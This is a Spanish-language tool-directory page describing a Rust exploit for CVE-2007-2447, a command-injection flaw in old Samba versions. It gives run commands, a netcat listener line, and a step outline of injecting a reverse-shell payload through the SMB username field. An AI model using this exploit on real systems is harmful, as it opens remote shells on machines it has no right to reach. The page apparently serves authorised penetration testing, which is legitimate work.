Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2007-2447 — Una implementación independiente en Rust del exploit CVE-2007-2447 dirigido a Samba smbd 3.0.20-Debian. | Kitploit
Herramientas/GitHubGitHub/nika0x38/cve-2007-2447
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubnika0x38/cve-2007-2447

CVE-2007-2447

Una implementación independiente en Rust del exploit CVE-2007-2447 dirigido a Samba smbd 3.0.20-Debian.

Ver Repositorio
hace 11 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Samba CVE-2007-2447

Rust Security

Una implementación independiente en Rust del exploit CVE-2007-2447 dirigido a Samba smbd 3.0.20-Debian.

Descripción de la Vulnerabilidad

CVE-2007-2447 es una vulnerabilidad de inyección de comandos en las versiones de Samba 3.0.0 hasta 3.0.25rc3. La vulnerabilidad reside en la función SamrChangePassword(), que no sanea adecuadamente la entrada del usuario, lo que permite a los atacantes ejecutar comandos arbitrarios mediante metacaracteres de shell en el campo de nombre de usuario durante la autenticación SMB.

Requisitos Previos

  • Tener Rust instalado en tu sistema
  • El objetivo debe ejecutar una versión vulnerable de Samba
  • El objetivo debe tener netcat disponible (normalmente instalado por defecto)

Uso

root@kitploit:~
cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>

Ejemplo

root@kitploit:~
# Set up a netcat listener
nc -lvnp 4444

# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100

Opciones

  • --lhost: Dirección IP de tu máquina atacante
  • --lport: Puerto para recibir la conexión de la shell inversa
  • --target: Dirección IP de la máquina objetivo

Cómo Funciona

  1. Genera una carga útil (payload) de shell inversa con netcat directamente en el código
  2. Inyecta la carga útil en el campo de nombre de usuario de SMB usando backticks
  3. Envía una solicitud SMB Session Setup malformada al puerto 445
  4. Explota la inyección de comandos en el procesamiento del nombre de usuario de Samba
  5. Ejecuta la carga útil de shell inversa en el objetivo

Características

  • Independiente: No requiere dependencias externas como Metasploit
  • Portable: Funciona en cualquier sistema con Rust instalado
  • Rápido: No genera procesos externos

Descargo de Responsabilidad

Esta herramienta es únicamente para fines educativos y de pruebas de penetración autorizadas. Úsala de forma responsable y solo en sistemas que poseas o para los que tengas permiso explícito para

Descargar herramienta